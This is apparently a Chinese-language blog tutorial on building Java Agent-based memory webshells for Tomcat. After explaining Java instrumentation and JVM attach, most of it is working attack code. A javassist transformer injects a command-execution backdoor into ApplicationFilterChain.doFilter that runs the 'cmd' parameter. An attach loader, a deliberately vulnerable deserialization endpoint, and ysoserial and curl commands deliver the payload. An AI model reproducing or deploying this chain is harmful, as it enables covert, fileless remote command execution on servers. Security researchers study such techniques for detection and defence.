内存马类型一共有四种:Filter型、Servlet型、Listener型以及Agent型
类似冰蝎,哥斯拉工具的内存马注入都是基于agent的。
前置知识
java Instrumentation指的是可以用独立于应用程序之外的代理(agent)程序来监测和协助运行在JVM上的应用程序。这种监测和协助包括但不限于获取JVM运行时状态,替换和修改类定义等。简单一句话概括下:Java Instrumentation可以在JVM启动后,动态修改已加载或者未加载的类,包括类的属性、方法。
Java Agent 简介
在 jdk 1.5 之后引入了 java.lang.instrument 包,该包提供了检测 java 程序的 Api,比如用于监控、收集性能信息、诊断问题,通过 java.lang.instrument 实现的工具我们称之为 Java Agent ,Java Agent 能够在不影响正常编译的情况下来修改字节码,即动态修改已加载或者未加载的类,包括类的属性、方法
Agent 内存马的实现就是利用了这一特性使其动态修改特定类的特定方法,将我们的恶意方法添加进去
说白了 Java Agent 只是一个 Java 类而已,只不过普通的 Java 类是以 main 函数作为入口点的,Java Agent 的入口点则是 premain 和 agentmain
Java Agent 支持两种方式进行加载:
- 实现 premain 方法,在启动时进行加载 (该特性在 jdk 1.5 之后才有)
- 实现 agentmain 方法,在启动后进行加载 (该特性在 jdk 1.6 之后才有)
Demo
premain
首先创建一个类DemoTest
import java.lang.instrument.Instrumentation;public class DemoTest {public static void premain(String agentArgs, Instrumentation inst) throws Exception{System.out.println(agentArgs);for(int i=0;i<5;i++){System.out.println("premain method is invoked!");}}}
然后写一个mf文件
Manifest-Version: 1.0Premain-Class: DemoTest
然后将文件编译成class再打包,IDEA打包可以,直接命令打包也可也,生成agent.jar
jar cvfm agent.jar agent.mf DemoTest.class
然后创建测试类demo
public class Hello {public static void main(String[] args) {System.out.println("Hello,Java");}}
Hello.mf
Manifest-Version: 1.0Main-Class: Hello
然后同样方法打包。
到最后得到hello.jar 和agent.jar
这时可以看到premain中的代码被执行了,还获取到了agentArgs参数
然而这种方法存在一定的局限性——只能在启动时使用-javaagent参数指定。在实际环境中,目标的JVM通常都是已经启动的状态,无法预先加载premain。相比之下,agentmain更加实用。
动态修改字节码
在实现 premain 的时候,我们除了能获取到 agentArgs 参数,还可以获取 Instrumentation 实例,那么 Instrumentation 实例是什么
先放几个函数和类的定义方便查询。
Instrumentation
Instrumentation 是 JVMTIAgent(JVM Tool Interface Agent)的一部分,Java agent通过这个类和目标 JVM 进行交互,从而达到修改数据的效果
在 Instrumentation 中增加了名叫 transformer 的 Class 文件转换器,转换器可以改变二进制流的数据
public interface Instrumentation {// 增加一个 Class 文件的转换器,转换器用于改变 Class 二进制流的数据,参数 canRetransform 设置是否允许重新转换。在类加载之前,重新定义 Class 文件,ClassDefinition 表示对一个类新的定义,如果在类加载之后,需要使用 retransformClasses 方法重新定义。addTransformer方法配置之后,后续的类加载都会被Transformer拦截。对于已经加载过的类,可以执行retransformClasses来重新触发这个Transformer的拦截。类加载的字节码被修改后,除非再次被retransform,否则不会恢复。void addTransformer(ClassFileTransformer transformer);// 删除一个类转换器boolean removeTransformer(ClassFileTransformer transformer);// 在类加载之后,重新定义 Class。这个很重要,该方法是1.6 之后加入的,事实上,该方法是 update 了一个类。void retransformClasses(Class<?>... classes) throws UnmodifiableClassException;// 判断目标类是否能够修改。boolean isModifiableClass(Class<?> theClass);// 获取目标已经加载的类。@SuppressWarnings("rawtypes")Class[] getAllLoadedClasses();......}
这个接口提供了addTransformer,getAllLoadedClasses,retransformClasses 等方法
addTransformer
addTransfromer方法来用于注册Transformer,所以我们可以通过编写ClassFileTransformer接口实现类来注册我们自己的转换器
voidaddTransformer(ClassFileTransformer transformer);
getAllLoadedClasses
getAllLoadedClasses 方法能列出所有已加载的 Class,我们可以通过遍历 Class 数组来寻找我们需要重定义的 class
retransformClasses
retransformClasses 方法能对已加载的 class 进行重新定义,也就是说如果我们的目标类已经被加载的话,我们可以调用该函数,来重新触发这个Transformer的拦截,以此达到对已加载的类进行字节码修改的效果
demo
我们先来个demo测试一下。
Agent.java
package Test;import java.lang.instrument.Instrumentation;public class Agent {public static void premain(String agentArgs, Instrumentation inst) {System.out.println("agentArgs : " + agentArgs);// 注册 DefineTransformerinst.addTransformer(new DefineTransformer(), true);}}
DefineTransformer.java
package Test;import java.lang.instrument.ClassFileTransformer;import java.lang.instrument.IllegalClassFormatException;import java.security.ProtectionDomain;public class DefineTransformer implements ClassFileTransformer {@Overridepublic byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {// 每当类被加载,就会调用 transform 函数System.out.println("premain load Class:" + className);return new byte[0];}}
然后配置打包文件src\META-INF\MANIFEST.MF
Manifest-Version: 1.0Can-Redefine-Classes: trueCan-Retransform-Classes: truePremain-Class: org.chabug.Agent
注意:如果需要修改已经被JVM加载过的类的字节码,那么还需要设置在 MANIFEST.MF 中添加 Can-Retransform-Classes: true 或 Can-Redefine-Classes: true
Can-Retransform-Classes 是否支持类的重新替换Can-Redefine-Classes 是否支持类的重新定义
如果没有在之后执行的时候会报错
选择我们刚才的配置文件。
添加模块输出,选择当前模块。
然后打包一下
构建好后就会输出agent.jar
然后再我们刚才创建的Main.java那里设置VM参数
-javaagent:out\artifacts\agent\agent.jar
运行结果
可以看到agent的org.chabug.Agent#premain优于Main方法而先被运行,并且在org.chabug.DefineTransformer#transform获取到了JVM加载的类。
那么思路回到内存shell的思路中,如果我们把这个agent加载到jvm中,那么就可以通过javassist进行字节码插桩,修改tomcat的filter实现类,从而实现内存马。
启动后利用VirtualMachine加载agent
tomcat运行前我们无法控制命令行参数,但是运行时JVM提供了com.sun.tools.attach.VirtualMachine的api,可以通过这个类attach jvm,然后通过loadAgent()函数把agent加载进去。
简单看一下这个包中的内容
VirtualMachine
VirtualMachine 可以来实现获取系统信息,内存dump、现成dump、类信息统计(例如JVM加载的类)。里面配备有几个方法LoadAgent,Attach 和 Detach 。下面来看看这几个方法的作用
Attach :该类允许我们通过给attach方法传入一个jvm的pid(进程id),远程连接到jvm上
VirtualMachine vm = VirtualMachine.attach(v.id());
loadAgent:向jvm注册一个代理程序agent,在该agent的代理程序中会得到一个Instrumentation实例,该实例可以 在class加载前改变class的字节码,也可以在class加载后重新加载。在调用Instrumentation实例的方法时,这些方法会使用ClassFileTransformer接口中提供的方法进行处理。
Detach:从 JVM 上面解除一个代理(agent)
VirtualMachineDescriptor
VirtualMachineDescriptor 是一个描述虚拟机的容器类,配合 VirtualMachine 类完成各种功能。
所以最后我们的注入流程大致如下:
通过 VirtualMachine 类的 attach(pid) 方法,可以 attach 到一个运行中的 java 进程上,之后便可以通过 loadAgent(agentJarPath) 来将agent 的 jar 包注入到对应的进程,然后对应的进程会调用agentmain方法。
ps:在windows中,jdk无法直接找到VirtualMachine 类,所以我们需要把tools.jar加入到库中。
接下来编写一个Demo
import com.sun.tools.attach.VirtualMachine;import com.sun.tools.attach.VirtualMachineDescriptor;import java.util.List;public class AgentMainDemo {public static void main(String[] args) throws Exception{String path = "agent.jar的路径";List<VirtualMachineDescriptor> list = VirtualMachine.list();for (VirtualMachineDescriptor v:list){System.out.println(v.displayName());if (v.displayName().contains("AgentMainDemo")){// 将 jvm 虚拟机的 pid 号传入 attach 来进行远程连接VirtualMachine vm = VirtualMachine.attach(v.id());// 将我们的 agent.jar 发送给虚拟机vm.loadAgent(path);vm.detach();}}}}
然后我们编写 AgentMain.java
import java.lang.instrument.Instrumentation;public class AgentMain {public static void agentmain(String agentArgs, Instrumentation ins) {ins.addTransformer(new DefineTransformer(),true);}}
编写 DefineTransformer.java
import java.lang.instrument.ClassFileTransformer;import java.lang.instrument.IllegalClassFormatException;import java.security.ProtectionDomain;public class DefineTransformer implements ClassFileTransformer {public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {System.out.println(className);return classfileBuffer;}}
打包jar
运行
成功调用了VirtualMachine.jar,输出了加载的类名
不过由于 tools.jar 并不会在 JVM 启动的时候默认加载,所以这里利用 URLClassloader 来加载我们的 tools.jar
package VirtualMachine;public class TestAgentMain {public static void main(String[] args) {try{java.io.File toolsPath = new java.io.File(System.getProperty("java.home").replace("jre","lib") + java.io.File.separator + "tools.jar");System.out.println(toolsPath.toURI().toURL());java.net.URL url = toolsPath.toURI().toURL();java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{url});Class<?> MyVirtualMachine = classLoader.loadClass("com.sun.tools.attach.VirtualMachine");Class<?> MyVirtualMachineDescriptor = classLoader.loadClass("com.sun.tools.attach.VirtualMachineDescriptor");java.lang.reflect.Method listMethod = MyVirtualMachine.getDeclaredMethod("list",null);java.util.List<Object> list = (java.util.List<Object>) listMethod.invoke(MyVirtualMachine,null);System.out.println("Running JVM Start..");for(int i=0;i<list.size();i++){Object o = list.get(i);java.lang.reflect.Method displayName = MyVirtualMachineDescriptor.getDeclaredMethod("displayName",null);String name = (String) displayName.invoke(o,null);System.out.println(name);if (name.contains("TestAgentMain")){java.lang.reflect.Method getId = MyVirtualMachineDescriptor.getDeclaredMethod("id",null);java.lang.String id = (java.lang.String) getId.invoke(o,null);System.out.println("id >>> " + id);java.lang.reflect.Method attach = MyVirtualMachine.getDeclaredMethod("attach",new Class[]{java.lang.String.class});java.lang.Object vm = attach.invoke(o,new Object[]{id});java.lang.reflect.Method loadAgent = MyVirtualMachine.getDeclaredMethod("loadAgent",new Class[]{java.lang.String.class});java.lang.String path = "D:\\Java\\Java内存马\\agent\\out\\artifacts\\VirtualMachine\\VirtualMachine.jar";loadAgent.invoke(vm,new Object[]{path});java.lang.reflect.Method detach = MyVirtualMachine.getDeclaredMethod("detach",null);detach.invoke(vm,null);break;}}} catch (Exception e){e.printStackTrace();}}}
实现内存马注入
寻找关键类
tomcat filter之前我们在Filter中分析过,主要的类是
org.apache.catalina.core.ApplicationFilterChain#doFilter
用户的请求在到达Servlet之前会经过Filter,以此来对我们的请求进行过滤。
这个方法就会调用我们自定义的filter方法。
该方法有ServletRequest和ServletResponse两个参数,里面封装了请求的request和response。另外,internalDoFilter方法是自定义filter的入口,如果在这里拦截,那么filter既通用,又不影响正常业务。
环境搭建
本次环境采用springboot
package com.example.demo.controller;import org.springframework.stereotype.Controller;import org.springframework.web.bind.annotation.RequestMapping;import org.springframework.web.bind.annotation.ResponseBody;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import java.io.ObjectInputStream;@Controllerpublic class CommonsCollectionsVuln {@ResponseBody@RequestMapping("/cc11")public String cc11Vuln(HttpServletRequest request, HttpServletResponse response) throws Exception {java.io.InputStream inputStream = request.getInputStream();ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);objectInputStream.readObject();return "Hello,World";}@ResponseBody@RequestMapping("/demo")public String demo(HttpServletRequest request, HttpServletResponse response) throws Exception{return "This is OK Demo!";}}
首先简单弄一个反序列化点,打上依赖
<dependency><groupId>commons-collections</groupId><artifactId>commons-collections</artifactId><version>3.2.1</version></dependency>
这样反序列化环境就搭建完成了
反序列化注入
AgentMain.java
import java.lang.instrument.Instrumentation;public class AgentMain {public static final String ClassName = "org.apache.catalina.core.ApplicationFilterChain";public static void agentmain(String agentArgs, Instrumentation ins) {ins.addTransformer(new DefineTransformer(),true);// 获取所有已加载的类Class[] classes = ins.getAllLoadedClasses();for (Class clas:classes){if (clas.getName().equals(ClassName)){try{// 对类进行重新定义ins.retransformClasses(new Class[]{clas});} catch (Exception e){e.printStackTrace();}}}}}
DefineTransformer.java
package memShell;import javassist.*;import java.lang.instrument.ClassFileTransformer;import java.security.ProtectionDomain;public class DefineTransformer implements ClassFileTransformer {public static final String ClassName = "org.apache.catalina.core.ApplicationFilterChain";public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) {className = className.replace("/",".");if (className.equals(ClassName)){System.out.println("Find the Inject Class: " + ClassName);ClassPool pool = ClassPool.getDefault();try {CtClass c = pool.getCtClass(className);CtMethod m = c.getDeclaredMethod("doFilter");m.insertBefore("javax.servlet.http.HttpServletRequest req = request;\n" +"javax.servlet.http.HttpServletResponse res = response;\n" +"java.lang.String cmd = request.getParameter(\"cmd\");\n" +"if (cmd != null){\n" +" try {\n" +" java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();\n" +" java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(in));\n" +" String line;\n" +" StringBuilder sb = new StringBuilder(\"\");\n" +" while ((line=reader.readLine()) != null){\n" +" sb.append(line).append(\"\\n\");\n" +" }\n" +" response.getOutputStream().print(sb.toString());\n" +" response.getOutputStream().flush();\n" +" response.getOutputStream().close();\n" +" } catch (Exception e){\n" +" e.printStackTrace();\n" +" }\n" +"}");byte[] bytes = c.toBytecode();// 将 c 从 classpool 中删除以释放内存c.detach();return bytes;} catch (Exception e){e.printStackTrace();}}return new byte[0];}}
然后打包一下,注意要把依赖打包进去
打包项目参考:
TestAgentMain.java:
try{java.lang.String path = "D:\\Java\\Java内存马\\AgentMemShell-main\\target\\AgentMain-1.0-SNAPSHOT-jar-with-dependencies.jar";java.io.File toolsPath = new java.io.File(System.getProperty("java.home").replace("jre","lib") + java.io.File.separator + "tools.jar");java.net.URL url = toolsPath.toURI().toURL();java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{url});Class/*<?>*/ MyVirtualMachine = classLoader.loadClass("com.sun.tools.attach.VirtualMachine");Class/*<?>*/ MyVirtualMachineDescriptor = classLoader.loadClass("com.sun.tools.attach.VirtualMachineDescriptor");java.lang.reflect.Method listMethod = MyVirtualMachine.getDeclaredMethod("list",null);java.util.List/*<Object>*/ list = (java.util.List/*<Object>*/) listMethod.invoke(MyVirtualMachine,null);System.out.println("Running JVM list ...");for(int i=0;i<list.size();i++){Object o = list.get(i);java.lang.reflect.Method displayName = MyVirtualMachineDescriptor.getDeclaredMethod("displayName",null);java.lang.String name = (java.lang.String) displayName.invoke(o,null);// 列出当前有哪些 JVM 进程在运行// 这里的 if 条件根据实际情况进行更改if (name.contains("com.example.demo.DemoApplication")){// 获取对应进程的 pid 号java.lang.reflect.Method getId = MyVirtualMachineDescriptor.getDeclaredMethod("id",null);java.lang.String id = (java.lang.String) getId.invoke(o,null);System.out.println("id >>> " + id);java.lang.reflect.Method attach = MyVirtualMachine.getDeclaredMethod("attach",new Class[]{java.lang.String.class});java.lang.Object vm = attach.invoke(o,new Object[]{id});java.lang.reflect.Method loadAgent = MyVirtualMachine.getDeclaredMethod("loadAgent",new Class[]{java.lang.String.class});loadAgent.invoke(vm,new Object[]{path});java.lang.reflect.Method detach = MyVirtualMachine.getDeclaredMethod("detach",null);detach.invoke(vm,null);System.out.println("Agent.jar Inject Success !!");break;}}} catch (Exception e){e.printStackTrace();}
效果实现
这里使用了比较好用的yso
https://github.com/woodpecker-framework/ysoserial-for-woodpecker
java -jar ysoserial-for-woodpecker-0.4.4.jar -g CommonsCollections11 -a code_file:./TestAgentMain.java > cc11demo.ser
然后把生成的ser文件直接curl传参
curl -v "http://localhost:9090/cc11" --data-binary "@./cc11demo.ser"
注入成功
若有收获,就点个赞吧
0 人点赞
